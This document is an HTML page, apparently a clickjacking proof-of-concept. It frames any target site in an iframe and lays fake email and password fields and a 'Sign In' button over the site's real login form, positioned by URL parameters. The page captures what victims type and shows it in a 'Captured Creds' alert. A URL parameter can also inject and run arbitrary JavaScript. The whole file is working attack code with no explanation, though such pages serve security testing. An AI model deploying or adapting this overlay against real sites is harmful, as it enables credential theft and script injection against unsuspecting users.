<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <script type="text/javascript" src="resources/js/jquery-1.11.0.js"></script>
    <link rel="shortcut icon" type="image/x-icon"
          href="resources/img/logo.ico">

    <script type="text/javascript">
        var config_url='';

         function getURLParameter(sParam) {
            var sPageURL='';
            if (window.location.search.substring(1).length == 0) {
                sPageURL = config_url.substring(1);
            }
            else {
                sPageURL = window.location.search.substring(1);
            }

            var decoded = decodeURIComponent(sPageURL);
            var sURLVariables = decoded.split('&');

            for (var i = 0; i < sURLVariables.length; i++) {
                var sParameterName = sURLVariables[i].split('=');
                if (sParameterName[0] == sParam) {
                    return sParameterName[1];
                }
            }
        }

        $(document).ready(function () {
            var targetURL = getURLParameter('target');

            var userNameTop = getURLParameter('userNameTop');
            var userNameLeft = getURLParameter('userNameLeft');

            var passwordTop = getURLParameter('passwordTop');
            var passwordLeft = getURLParameter('passwordLeft');

            var buttonTop = getURLParameter('buttonTop');
            var buttonLeft = getURLParameter('buttonLeft');

            var passwordStyleParam = getURLParameter('passwordStyle');
            var usernameStyleParam = getURLParameter('usernameStyle');
            var buttonStyleParam = getURLParameter('buttonStyle');
            var customJavaScript = getURLParameter('customJavaScript');

            var emailStyle = usernameStyleParam + 'position: absolute; z-index: 2; top: ' + userNameTop + 'px; left: ' + userNameLeft + 'px;';
            $('#inputMalEmail').attr('style', emailStyle);

            var passwordStyle = passwordStyleParam + 'position: absolute; z-index: 2; top: ' + passwordTop + 'px; left: ' + passwordLeft + 'px;';
            $('#inputMalPassword').attr('style', passwordStyle);

            var buttonStyle = buttonStyleParam + 'position: absolute; z-index: 2; top: ' + buttonTop + 'px; left: ' + buttonLeft + 'px;';
            $('#jacksButton').attr('style', buttonStyle);

            $("#targetIframe").attr('src', targetURL);

            $('#jacksButton').click(function () {
                if (customJavaScript.length>0) {
                    $('<script>').attr('type', 'text/javascript').text(customJavaScript).appendTo('head');
                }
                else
                {
                    var jacksEmail = $('#inputMalEmail').val();
                    var jacksPassword = $('#inputMalPassword').val();
                    console.log('Email: ' + jacksEmail);
                    alert('Captured Creds are: \nUsername is: ' + jacksEmail + ' \nAND\nPassword is: ' + jacksPassword);
                    location.reload();
                }
            });
        });
    </script>

</head>

<body style=" margin: 0px;padding: 0px; border: 0px;width: 100%;height: 100%;">


<input type="text"
       style=""
       autocomplete="off" class="" id="inputMalEmail" placeholder="">


<input type="password"
       style=""
       autocomplete="off" class="" id="inputMalPassword" placeholder="">

<button type="submit"
        style=""
        id="jacksButton">Sign In
</button>


<iframe id="targetIframe" scrolling="no" frameBorder="0"
        style="z-index: 1; position: relative;overflow: hidden;margin: 0; padding: 0;display: block"
        src="" width="100%"
        height="1000">
</iframe>

</body>

</html>
